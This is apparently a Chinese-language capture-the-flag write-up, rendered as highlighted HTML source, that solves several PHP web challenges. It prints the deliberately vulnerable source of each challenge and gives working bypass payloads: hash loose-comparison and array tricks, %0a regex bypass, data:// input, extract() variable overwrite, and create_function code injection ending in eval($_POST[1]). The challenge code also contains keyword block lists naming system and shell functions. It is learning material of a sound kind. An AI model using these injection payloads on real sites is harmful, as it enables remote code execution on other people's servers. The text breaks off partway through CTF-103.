class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'flag'</span><span class="pun">])</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> </span><span class="pun">!</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'flag'</span><span class="pun">])){</span><span class="pln">    </span><span class="com">//GET和POST其中之一必须传flag</span></code></li><li class="L8"><code class="lang-php"><span class="pln">    </span><span class="kwd">exit</span><span class="pun">(</span><span class="pln">$yds</span><span class="pun">);</span></code></li><li class="L9"><code class="lang-php"><span class="pun">}</span></code></li><li class="L0"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'flag'</span><span class="pun">]</span><span class="pln"> </span><span class="pun">===</span><span class="pln"> </span><span class="str">'flag'</span><span class="pln">  </span><span class="pun">||</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'flag'</span><span class="pun">]</span><span class="pln"> </span><span class="pun">===</span><span class="pln"> </span><span class="str">'flag'</span><span class="pun">){</span><span class="pln">    </span><span class="com">//GET和POST传flag,必须不能是flag=flag</span></code></li><li class="L1"><code class="lang-php"><span class="pln">    </span><span class="kwd">exit</span><span class="pun">(</span><span class="pln">$is</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="pun">}</span></code></li><li class="L3"><code class="lang-php"><span class="pln">echo </span><span class="str">"the flag is: "</span><span class="pun">.</span><span class="pln">$flag</span><span class="pun">;</span></code></li></ol></pre>
<p><strong>需要进行目录扫描找到源码<br>NoHack.rar<br>解压得到源码<br>进行代码审计<br>php可变变量，仔细分析一下，发现可以构造下面的payload</strong></p>
<h3 id="h3-payload-"><a name="payload:" class="reference-link"></a><span class="header-link octicon octicon-link"></span>payload:</h3><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">?</span><span class="pln">handsome</span><span class="pun">=</span><span class="pln">flag</span><span class="pun">&amp;</span><span class="pln">flag</span><span class="pun">=</span><span class="pln">handsome</span></code></li><li class="L1"><code></code></li><li class="L2"><code><span class="com">//这样的话，经过第二个foreach循环，$handsome就会等于$flag，$flag等于$handsome会不变，经过第三个循环第一次遍历$_GET['flag']="handsome"=$x="handsome"!='flag'，退出输出$handsome即$flag的值</span></code></li><li class="L3"><code></code></li><li class="L4"><code><span class="pun">?</span><span class="pln">yds</span><span class="pun">=</span><span class="pln">flag </span></code></li><li class="L5"><code></code></li><li class="L6"><code><span class="com">//这样的话，在经过第二个foreach循环时，$yds就会等于$flag,在经过第三个foreach循环时，没传flag直接跳过，然后if满足条件，退出输出$yds即$flag</span></code></li></ol></pre><h2 id="h2-ctf-101"><a name="CTF-101" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-101</h2><h3 id="h3-index-php-"><a name="index.php源码" class="reference-link"></a><span class="header-link octicon octicon-link"></span>index.php源码</h3><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="tag">&lt;meta</span><span class="pln"> </span><span class="atn">charset</span><span class="pun">=</span><span class="atv">"utf-8"</span><span class="pln"> </span><span class="tag">/&gt;</span></code></li><li class="L1"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L2"><code class="lang-php"><span class="lit">@$a</span><span class="pln"> </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'a'</span><span class="pun">];</span></code></li><li class="L3"><code class="lang-php"><span class="lit">@$b</span><span class="pln"> </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'b'</span><span class="pun">];</span></code></li><li class="L4"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">$a </span><span class="pun">!=</span><span class="pln"> $b </span><span class="pun">&amp;&amp;</span><span class="pln"> md5</span><span class="pun">(</span><span class="pln">$a</span><span class="pun">)</span><span class="pln"> </span><span class="pun">==</span><span class="pln"> md5</span><span class="pun">(</span><span class="pln">$b</span><span class="pun">))</span></code></li><li class="L5"><code class="lang-php"><span class="pun">{</span></code></li><li class="L6"><code class="lang-php"><span class="pln">    echo </span><span class="str">"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"</span><span class="pun">;</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    echo </span><span class="str">'flag双重加密了'</span><span class="pun">;</span></code></li><li class="L8"><code class="lang-php"><span class="pun">}</span></code></li><li class="L9"><code class="lang-php"><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L0"><code class="lang-php"><span class="pln">    echo </span><span class="str">'扫描一下?'</span><span class="pun">;</span></code></li><li class="L1"><code class="lang-php"><span class="pun">}</span></code></li><li class="L2"><code class="lang-php"><span class="pun">?&gt;</span></code></li></ol></pre>
<p><strong>访问flag.php进行传参<br>两种方式</strong></p>
<h3 id="h3-payload-"><a name="payload:" class="reference-link"></a><span class="header-link octicon octicon-link"></span>payload:</h3><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">?</span><span class="pln">a</span><span class="pun">[]=</span><span class="lit">1</span><span class="pun">&amp;</span><span class="pln">b</span><span class="pun">[]=</span><span class="pln">        </span><span class="com">//数组绕过</span></code></li><li class="L1"><code></code></li><li class="L2"><code><span class="pun">?</span><span class="pln">a</span><span class="pun">=</span><span class="pln">QNKCDZO</span><span class="pun">&amp;</span><span class="pln">b</span><span class="pun">=</span><span class="pln">s878926199a    </span><span class="com">//md5弱比较</span></code></li></ol></pre><p><strong>得到被加密的flag-&gt;base64解密-&gt;md5解密</strong></p>
<h2 id="h2-ctf-102"><a name="CTF-102" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-102</h2><h3 id="h3-u6E90u7801"><a name="源码" class="reference-link"></a><span class="header-link octicon octicon-link"></span>源码</h3><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="pln"> </span><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code class="lang-php"><span class="pln">highlight_file</span><span class="pun">(</span><span class="pln">__FILE__</span><span class="pun">);</span></code></li><li class="L2"><code class="lang-php"><span class="pln">error_reporting</span><span class="pun">(</span><span class="lit">0</span><span class="pun">);</span><span class="pln"> </span></code></li><li class="L3"><code class="lang-php"></code></li><li class="L4"><code class="lang-php"><span class="pln">$file </span><span class="pun">=</span><span class="pln"> </span><span class="str">"index.php"</span><span class="pun">;</span></code></li><li class="L5"><code class="lang-php"><span class="pln">$shana </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'shana'</span><span class="pun">];</span></code></li><li class="L6"><code class="lang-php"><span class="pln">$passwd </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'passwd'</span><span class="pun">];</span></code></li><li class="L7"><code class="lang-php"><span class="pln">$arg </span><span class="pun">=</span><span class="pln"> </span><span class="str">''</span><span class="pun">;</span></code></li><li class="L8"><code class="lang-php"><span class="pln">$code </span><span class="pun">=</span><span class="pln"> </span><span class="str">''</span><span class="pun">;</span></code></li><li class="L9"><code class="lang-php"></code></li><li class="L0"><code class="lang-php"><span class="pln">echo </span><span class="str">"&lt;br /&gt;&lt;font color=red&gt;&lt;B&gt;This is a very simple challenge and if you solve it I will give you a flag. Good Luck!&lt;/B&gt;&lt;br&gt;&lt;/font&gt;"</span><span class="pun">;</span></code></li><li class="L1"><code class="lang-php"></code></li><li class="L2"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">$_SERVER</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span><span class="pln"> </span></code></li><li class="L3"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span></code></li><li class="L4"><code class="lang-php"><span class="pln">        preg_match</span><span class="pun">(</span><span class="str">'/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i'</span><span class="pun">,</span><span class="pln"> $_SERVER</span><span class="pun">[</span><span class="str">'QUERY_STRING'</span><span class="pun">])</span></code></li><li class="L5"><code class="lang-php"><span class="pln">        </span><span class="pun">)</span><span class="pln">  </span></code></li><li class="L6"><code class="lang-php"><span class="pln">        </span><span class="kwd">die</span><span class="pun">(</span><span class="str">'You seem to want to do something bad?'</span><span class="pun">);</span><span class="pln"> </span></code></li><li class="L7"><code class="lang-php"><span class="pun">}</span></code></li><li class="L8"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(!</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">'/http|https/i'</span><span class="pun">,</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'file'</span><span class="pun">]))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L9"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">'/^aqua_is_cute$/'</span><span class="pun">,</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'debu'</span><span class="pun">])</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'debu'</span><span class="pun">]</span><span class="pln"> </span><span class="pun">!==</span><span class="pln"> </span><span class="str">'aqua_is_cute'</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span><span class="pln"> </span></code></li><li class="L0"><code class="lang-php"><span class="pln">        $file </span><span class="pun">=</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">"file"</span><span class="pun">];</span><span class="pln"> </span></code></li><li class="L1"><code class="lang-php"><span class="pln">        echo </span><span class="str">"Neeeeee! Good Job!&lt;br&gt;"</span><span class="pun">;</span></code></li><li class="L2"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span><span class="pln"> </span></code></li><li class="L3"><code class="lang-php"><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pln"> </span><span class="kwd">die</span><span class="pun">(</span><span class="str">'fxck you! What do you want to do ?!'</span><span class="pun">);</span></code></li><li class="L4"><code class="lang-php"></code></li><li class="L5"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">$_REQUEST</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span><span class="pln"> </span></code></li><li class="L6"><code class="lang-php"><span class="pln">    </span><span class="kwd">foreach</span><span class="pun">(</span><span class="pln">$_REQUEST </span><span class="kwd">as</span><span class="pln"> $value</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span><span class="pln"> </span></code></li><li class="L7"><code class="lang-php"><span class="pln">        </span><span class="kwd">if</span><span class="pun">(</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">'/[a-zA-Z]/i'</span><span class="pun">,</span><span class="pln"> $value</span><span class="pun">))</span><span class="pln">  </span></code></li><li class="L8"><code class="lang-php"><span class="pln">            </span><span class="kwd">die</span><span class="pun">(</span><span class="str">'fxck you! I hate English!'</span><span class="pun">);</span><span class="pln"> </span></code></li><li class="L9"><code class="lang-php"><span class="pln">    </span><span class="pun">}</span><span class="pln"> </span></code></li><li class="L0"><code class="lang-php"><span class="pun">}</span><span class="pln"> </span></code></li><li class="L1"><code class="lang-php"></code></li><li class="L2"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">file_get_contents</span><span class="pun">(</span><span class="pln">$file</span><span class="pun">)</span><span class="pln"> </span><span class="pun">!==</span><span class="pln"> </span><span class="str">'debu_debu_aqua'</span><span class="pun">)</span></code></li><li class="L3"><code class="lang-php"><span class="pln">    </span><span class="kwd">die</span><span class="pun">(</span><span class="str">"Aqua is the cutest five-year-old child in the world! Isn't it ?&lt;br&gt;"</span><span class="pun">);</span></code></li><li class="L4"><code class="lang-php"></code></li><li class="L5"><code class="lang-php"></code></li><li class="L6"><code class="lang-php"><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln"> sha1</span><span class="pun">(</span><span class="pln">$shana</span><span class="pun">)</span><span class="pln"> </span><span class="pun">===</span><span class="pln"> sha1</span><span class="pun">(</span><span class="pln">$passwd</span><span class="pun">)</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> $shana </span><span class="pun">!=</span><span class="pln"> $passwd </span><span class="pun">){</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    extract</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">"flag"</span><span class="pun">]);</span></code></li><li class="L8"><code class="lang-php"><span class="pln">    echo </span><span class="str">"Very good! you know my password. But what is flag?&lt;br&gt;"</span><span class="pun">;</span></code></li><li class="L9"><code class="lang-php"><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L0"><code class="lang-php"><span class="pln">    </span><span class="kwd">die</span><span class="pun">(</span><span class="str">"fxck you! you don't know my password! And you don't know sha1! why you come here!"</span><span class="pun">);</span></code></li><li class="L1"><code class="lang-php"><span class="pun">}</span></code></li><li class="L2"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">'/^[a-z0-9]*$/isD'</span><span class="pun">,</span><span class="pln"> $code</span><span class="pun">)</span><span class="pln"> </span><span class="pun">||</span><span class="pln"> </span></code></li><li class="L3"><code class="lang-php"><span class="pln">preg_match</span><span class="pun">(</span><span class="str">'/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&amp;|\$|\*|\||\&lt;|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i'</span><span class="pun">,</span><span class="pln"> $arg</span><span class="pun">)</span><span class="pln"> </span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span><span class="pln"> </span></code></li><li class="L4"><code class="lang-php"><span class="pln">    </span><span class="kwd">die</span><span class="pun">(</span><span class="str">"&lt;br /&gt;Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w="</span><span class="pun">);</span><span class="pln"> </span></code></li><li class="L5"><code class="lang-php"><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pln"> </span><span class="pun">{</span><span class="pln"> </span></code></li><li class="L6"><code class="lang-php"><span class="pln">    include </span><span class="str">"flag.php"</span><span class="pun">;</span></code></li><li class="L7"><code class="lang-php"><span class="pln">    $code</span><span class="pun">(</span><span class="str">''</span><span class="pun">,</span><span class="pln"> $arg</span><span class="pun">);</span><span class="pln"> </span></code></li><li class="L8"><code class="lang-php"><span class="pun">}</span><span class="pln"> </span><span class="pun">?&gt;</span></code></li></ol></pre>
<p><strong>这道题考的知识点比较多，分开记一下</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">$_SERVER</span><span class="pun">[‘</span><span class="pln">QUERY_STRING</span><span class="pun">’]匹配绕过</span></code></li><li class="L1"><code><span class="pln">$_SERVER</span><span class="pun">[</span><span class="str">'QUERY_STRING'</span><span class="pun">]返回</span><span class="pln">url</span><span class="pun">中查询的字符串，与此类似的还有：</span></code></li><li class="L2"><code></code></li><li class="L3"><code><span class="pln">$_SERVER</span><span class="pun">[</span><span class="str">'REQUEST_URI'</span><span class="pun">]返回访问此页面所需的</span><span class="pln">URI</span></code></li><li class="L4"><code><span class="pln">$_SERVER</span><span class="pun">[</span><span class="str">'SCRIPT_NAME'</span><span class="pun">]返回包含当前脚本的路径</span></code></li><li class="L5"><code><span class="pln">$_SERVER</span><span class="pun">[</span><span class="str">'PHP_SELF'</span><span class="pun">]当前正在执行脚本的文件名</span></code></li><li class="L6"><code><span class="pun">举个例子：(浏览器自动将</span><span class="pln">file</span><span class="pun">的</span><span class="pln">url</span><span class="pun">编码解码了)</span></code></li></ol></pre><p><strong>可以看到，$_SERVER[‘QUERY_STRING’]和$_SERVER[‘REQUEST_URI’]在传输时不会url解码，而$_GET,$_POST会url解码，因此我们可以url编码绕过下面代码：</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="kwd">if</span><span class="pun">(</span><span class="pln">$_SERVER</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span><span class="pln"> </span></code></li><li class="L1"><code><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">    preg_match</span><span class="pun">(</span><span class="str">'/shana|debu|aqua|cute|arg|code|flag|system|exec|passwd|ass|eval|sort|shell|ob|start|mail|\$|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|read|inc|info|bin|hex|oct|echo|print|pi|\.|\"|\'|log/i'</span><span class="pun">,</span><span class="pln"> $_SERVER</span><span class="pun">[</span><span class="str">'QUERY_STRING'</span><span class="pun">])</span></code></li><li class="L2"><code><span class="pln">        </span><span class="pun">)</span><span class="pln">  </span></code></li><li class="L3"><code><span class="pln">        </span><span class="kwd">die</span><span class="pun">(</span><span class="str">'You seem to want to do something bad?'</span><span class="pun">);</span><span class="pln"> </span></code></li><li class="L4"><code><span class="pun">}</span></code></li></ol></pre><p><strong>字符串匹配绕过</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">'/^aqua_is_cute$/'</span><span class="pun">,</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'debu'</span><span class="pun">])</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> $_GET</span><span class="pun">[</span><span class="str">'debu'</span><span class="pun">]</span><span class="pln"> </span><span class="pun">!==</span><span class="pln"> </span><span class="str">'aqua_is_cute'</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span><span class="pln"> </span></code></li><li class="L1"><code><span class="pln">    echo </span><span class="str">"Neeeeee! Good Job!&lt;br&gt;"</span><span class="pun">;</span></code></li><li class="L2"><code><span class="pun">}</span></code></li></ol></pre><p>由于没有/s修饰符用来在匹配时匹配换行符，我们可以使用%0a换行污染绕过</p>
<p><strong>$_REQUEST字母匹配绕过</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="kwd">if</span><span class="pun">(</span><span class="pln">$_REQUEST</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span><span class="pln"> </span></code></li><li class="L1"><code><span class="pln">    </span><span class="kwd">foreach</span><span class="pun">(</span><span class="pln">$_REQUEST </span><span class="kwd">as</span><span class="pln"> $value</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span><span class="pln"> </span></code></li><li class="L2"><code><span class="pln">        </span><span class="kwd">if</span><span class="pun">(</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">'/[a-zA-Z]/i'</span><span class="pun">,</span><span class="pln"> $value</span><span class="pun">))</span><span class="pln">  </span></code></li><li class="L3"><code><span class="pln">            </span><span class="kwd">die</span><span class="pun">(</span><span class="str">'fxck you! I hate English!'</span><span class="pun">);</span><span class="pln"> </span></code></li><li class="L4"><code><span class="pln">    </span><span class="pun">}</span><span class="pln"> </span></code></li><li class="L5"><code><span class="pun">}</span></code></li></ol></pre><p><strong>之前的参数都是GET型的，而POST的优先级比GET的要高，因此我们可以POST同样名称满足条件的值，比如数字,</strong></p>
<p><strong>数组类型的数据不需要POST，preg_match()只能匹配字符串，数组得以绕过</strong></p>
<p><strong>file_get_contents比对绕过</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">file_get_contents</span><span class="pun">(</span><span class="pln">$file</span><span class="pun">)</span><span class="pln"> </span><span class="pun">!==</span><span class="pln"> </span><span class="str">'debu_debu_aqua'</span><span class="pun">)</span></code></li><li class="L1"><code><span class="pln">    </span><span class="kwd">die</span><span class="pun">(</span><span class="str">"Aqua is the cutest five-year-old child in the world! Isn't it ?&lt;br&gt;"</span><span class="pun">);</span></code></li></ol></pre><p>刚开始想的是php://input，后来发现要POST数据，因此便不能用了，这里可以用data://，<br>示例：</p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pln">data</span><span class="pun">:</span><span class="com">//text/plain,&lt;?php phpinfo()?&gt;</span></code></li><li class="L1"><code><span class="pln">data</span><span class="pun">:</span><span class="com">//text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=</span></code></li></ol></pre><p><strong>sha1比较绕过</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln"> sha1</span><span class="pun">(</span><span class="pln">$shana</span><span class="pun">)</span><span class="pln"> </span><span class="pun">===</span><span class="pln"> sha1</span><span class="pun">(</span><span class="pln">$passwd</span><span class="pun">)</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> $shana </span><span class="pun">!=</span><span class="pln"> $passwd </span><span class="pun">){</span></code></li><li class="L1"><code><span class="pln">    extract</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">"flag"</span><span class="pun">]);</span></code></li><li class="L2"><code><span class="pln">    echo </span><span class="str">"Very good! you know my password. But what is flag?&lt;br&gt;"</span><span class="pun">;</span></code></li><li class="L3"><code><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pun">{</span></code></li><li class="L4"><code><span class="pln">    </span><span class="kwd">die</span><span class="pun">(</span><span class="str">"fxck you! you don't know my password! And you don't know sha1! why you come here!"</span><span class="pun">);</span></code></li><li class="L5"><code><span class="pun">}</span></code></li></ol></pre><p><strong>直接数组绕过，或者sha1碰撞</strong></p>
<p>extract变量覆盖<br>因为extract()函数使用数组键名作为变量名，使用数组键值作为变量值，针对数组中的每个元素，将在当前符号表中创建对应的一个变量，所以这里我们可以传数组，即flag[code]和flag[arg]的形式</p>
<p><strong>create_function代码注入</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="kwd">if</span><span class="pun">(</span><span class="pln">preg_match</span><span class="pun">(</span><span class="str">'/^[a-z0-9]*$/isD'</span><span class="pun">,</span><span class="pln"> $code</span><span class="pun">)</span><span class="pln"> </span><span class="pun">||</span><span class="pln"> </span></code></li><li class="L1"><code><span class="pln">preg_match</span><span class="pun">(</span><span class="str">'/fil|cat|more|tail|tac|less|head|nl|tailf|ass|eval|sort|shell|ob|start|mail|\`|\{|\%|x|\&amp;|\$|\*|\||\&lt;|\"|\'|\=|\?|sou|show|cont|high|reverse|flip|rand|scan|chr|local|sess|id|source|arra|head|light|print|echo|read|inc|flag|1f|info|bin|hex|oct|pi|con|rot|input|\.|log|\^/i'</span><span class="pun">,</span><span class="pln"> $arg</span><span class="pun">)</span><span class="pln"> </span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span><span class="pln"> </span></code></li><li class="L2"><code><span class="pln">    </span><span class="kwd">die</span><span class="pun">(</span><span class="str">"&lt;br /&gt;Neeeeee~! I have disabled all dangerous functions! You can't get my flag =w="</span><span class="pun">);</span><span class="pln"> </span></code></li><li class="L3"><code><span class="pun">}</span><span class="pln"> </span><span class="kwd">else</span><span class="pln"> </span><span class="pun">{</span><span class="pln"> </span></code></li><li class="L4"><code><span class="pln">    include </span><span class="str">"flag.php"</span><span class="pun">;</span></code></li><li class="L5"><code><span class="pln">    $code</span><span class="pun">(</span><span class="str">''</span><span class="pun">,</span><span class="pln"> $arg</span><span class="pun">);</span><span class="pln"> </span></code></li><li class="L6"><code><span class="pun">}</span></code></li></ol></pre><p><strong>最后一个过滤我们可以用create_function()绕过:</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L1"><code><span class="pln">$myFunc </span><span class="pun">=</span><span class="pln"> create_function</span><span class="pun">(</span><span class="str">'$a, $b'</span><span class="pun">,</span><span class="pln"> </span><span class="str">'return($a+$b);}eval($_POST[1]);//'</span><span class="pun">);</span></code></li></ol></pre><p><strong>执行时相当于：</strong></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="kwd">function</span><span class="pln"> myFunc</span><span class="pun">(</span><span class="pln">$a</span><span class="pun">,</span><span class="pln"> $b</span><span class="pun">){</span></code></li><li class="L1"><code><span class="pln">    </span><span class="kwd">return</span><span class="pln"> $a</span><span class="pun">+</span><span class="pln">$b</span><span class="pun">;</span></code></li><li class="L2"><code><span class="pun">}</span></code></li><li class="L3"><code><span class="kwd">eval</span><span class="pun">(</span><span class="pln">$_POST</span><span class="pun">[</span><span class="lit">1</span><span class="pun">]);</span><span class="com">//}</span></code></li></ol></pre><h3 id="h3-payload"><a name="payload" class="reference-link"></a><span class="header-link octicon octicon-link"></span>payload</h3><p><strong>先看下所有变量:</strong></p>
<p><img src="https://nc0.cdn.zkaq.cn/md/5597/d44bc851f3d84ceccfebf837da1cc842_72232.png" alt=""></p>
<pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code><span class="pun">?%</span><span class="lit">64</span><span class="pun">%</span><span class="lit">65</span><span class="pun">%</span><span class="lit">62</span><span class="pun">%</span><span class="lit">75</span><span class="pun">=%</span><span class="lit">61</span><span class="pun">%</span><span class="lit">71</span><span class="pun">%</span><span class="lit">75</span><span class="pun">%</span><span class="lit">61</span><span class="pun">%</span><span class="lit">5f</span><span class="pun">%</span><span class="lit">69</span><span class="pun">%</span><span class="lit">73</span><span class="pun">%</span><span class="lit">5f</span><span class="pun">%</span><span class="lit">63</span><span class="pun">%</span><span class="lit">75</span><span class="pun">%</span><span class="lit">74</span><span class="pun">%</span><span class="lit">65</span><span class="pun">%</span><span class="lit">0a</span><span class="pun">&amp;</span><span class="pln">file</span><span class="pun">=</span><span class="pln">data</span><span class="pun">:</span><span class="com">//text/plain,%64%65%62%75%5f%64%65%62%75%5f%61%71%75%61&amp;%73%68%61%6e%61[]=1&amp;%70%61%73%73%77%64[]=2&amp;%66%6c%61%67%5b%63%6f%64%65%5d=create_function&amp;%66%6c%61%67%5b%61%72%67%5d=}var_dump(get_defined_vars());//</span></code></li><li class="L1"><code></code></li><li class="L2"><code><span class="pln">POST</span><span class="pun">:</span><span class="pln">    debu</span><span class="pun">=</span><span class="lit">1</span><span class="pun">&amp;</span><span class="pln">passwd</span><span class="pun">=</span><span class="lit">1</span><span class="pun">&amp;</span><span class="pln">file</span><span class="pun">=</span><span class="lit">1</span></code></li></ol></pre><h2 id="h2-ctf-103"><a name="CTF-103" class="reference-link"></a><span class="header-link octicon octicon-link"></span>CTF-103</h2><h3 id="h3-u6E90u7801"><a name="源码" class="reference-link"></a><span class="header-link octicon octicon-link"></span>源码</h3><pre class="prettyprint linenums prettyprinted" style=""><ol class="linenums"><li class="L0"><code class="lang-php"><span class="tag">&lt;img</span><span class="pln"> </span><span class="atn">src</span><span class="pun">=</span><span class="atv">'ctf.bmp'</span><span class="tag">/&gt;</span></code></li><li class="L1"><code class="lang-php"><span class="pun">&lt;?</span><span class="pln">php</span></code></li><li class="L2"><code class="lang-php"><span class="pln">include </span><span class="str">'flag.php'</span><span class="pun">;</span></code></li><li class="L3"><code class="lang-php"><span class="kwd">if</span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'gg'</span><span class="pun">])&amp;&amp;</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'id'</span><span class="pun">]))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L4"><code class="lang-php"><span class="pln">    $id</span><span class="pun">=</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'id'</span><span class="pun">];</span></code></li><li class="L5"><code class="lang-php"><span class="pln">    $gg</span><span class="pun">=</span><span class="pln">$_GET</span><span class="pun">[</span><span class="str">'gg'</span><span class="pun">];</span></code></li><li class="L6"><code class="lang-php"><span class="pln">    </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(</span><span class="pln">md5</span><span class="pun">(</span><span class="pln">$id</span><span class="pun">)</span><span class="pln"> </span><span class="pun">===</span><span class="pln"> md5</span><span class="pun">(</span><span class="pln">$gg</span><span class="pun">)</span><span class="pln"> </span><span class="pun">&amp;&amp;</span><span class="pln"> $id </span><span class="pun">!==</span><span class="pln"> $gg</span><span class="pun">)</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L7"><code class="lang-php"><span class="pln">        echo </span><span class="str">'You got the first step'</span><span class="pun">;</span></code></li><li class="L8"><code class="lang-php"><span class="pln">        </span><span class="kwd">if</span><span class="pun">(</span><span class="pln">isset</span><span class="pun">(</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'passwd'</span><span class="pun">]))</span><span class="pln"> </span><span class="pun">{</span></code></li><li class="L9"><code class="lang-php"><span class="pln">            $passwd</span><span class="pun">=</span><span class="pln">$_POST</span><span class="pun">[</span><span class="str">'passwd'</span><span class="pun">];</span></code></li><li class="L0"><code class="lang-php"><span class="pln">            </span><span class="kwd">if</span><span class="pln"> </span><span class="pun">(!</span><span class="pln">is_numeric</span><span class="pun">(</span><span class="pln">$passwd</span><span class="pun">))</span></code></li><li class="L1"><code class="lang-php"><span class="pln">         